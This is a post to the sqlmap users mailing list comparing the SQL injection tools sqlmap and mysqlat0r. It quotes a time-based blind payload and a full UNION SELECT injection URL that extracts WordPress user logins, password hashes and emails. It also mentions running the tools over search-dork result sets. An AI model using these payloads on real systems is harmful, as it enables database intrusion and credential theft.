sqlmap/1.0-dev (r4351)
found this
Place: GETParameter: id Type: AND/OR time-based blind Title: MySQL >
5.0.11 AND time-based blind Payload: id=155 AND SLEEP(5)---
against
web application technology: Apache, PHP 5.2.8back-end DBMS: MySQL 5.0.11banner:
'5.0.77'
but the exploit was agonizingly slow.
testing each other individual technique --technique=BEUS at default level and
risk produced no positives
mysqlat0r found what it terms, 'method get, with single parameter, 'numerical
without comments' positive and could quickly catalog dbs and dump full tables
here is an example of it's exploit url
http://127.0.0.1/news/edumacation/salsandvinablals/2011/individittiual09.php?id=-666%20UNION%20ALL%20SELECT%20null,concat(0x585858535441525444554D50585858,ID,0x7C7C7C,user_login,0x7C7C7C,user_pass,0x7C7C7C,user_nicename,0x7C7C7C,user_email,0x7C7C7C,user_url,0x7C7C7C,user_registered,0x7C7C7C,user_activation_key,0x7C7C7C,user_status,0x7C7C7C,display_name,0x7C7C7C,0x585858454E4444554D50585858),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20redridinghood_OSyummy2k11.wp_users%20LIMIT%200,10&
full source for mysqlat0r available here
http://www.scrt.ch/en/attack/downloads/mini-mysqlat0r
my previous experience has been that mysqlat0r only is able to exploit what it
claims to have found about 10% of the time.
it would be nice if sqlmap would continue to test the other techniques even
after finding a positive, and show you a list of available positives in
subsequent passes, as some are much faster, or have better features.
particularly when processing a dork resultset.
i have seen it ask if i want to continue after a positive, but it doesn't seem
to actually attempt each of the other techniques, but just skipped to the next
result set item. I'll retest that.
i have been able to force it with the BEUST flags, and select the preferred one
at runtime, but the UI for doing so is a little clumsy.
------------------------------------------------------------------------------
Get a FREE DOWNLOAD! and learn more about uberSVN rich system,
user administration capabilities and model configuration. Take
the hassle out of deploying and managing Subversion and the
tools developers use with it. http://p.sf.net/sfu/wandisco-d2d-2
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users